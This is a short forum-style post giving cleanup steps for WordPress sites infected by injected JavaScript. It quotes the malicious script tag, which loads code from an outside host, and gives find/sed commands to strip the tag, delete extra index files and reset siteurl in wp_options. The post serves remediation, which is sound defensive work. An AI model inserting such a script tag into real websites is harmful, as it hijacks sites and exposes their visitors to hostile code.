Hello.
My website have been attack this night too.
All your index.php files have been infected by an injection of a javascript call ‘<script type=’text/javascript’ src=’https://ws.stivenfernando.com/stm?v=2.2.0′></script>’
1 – You have to remove this line in each index file by using find & sed
find . -name “index.php” -exec sed -i “s#<script type=’text/javascript’ src=’https://ws.stivenfernando.com/stm?v=2.2.0′></script>##g” {} +
2 – Remove extra index files created by the sript
find . -name “._index.php” -print -delete
3 – The script have change the siteurl in the database you have to fix it
in the table wp_options where option_name is siteurl replace the option_value by the correct url
Glad to help
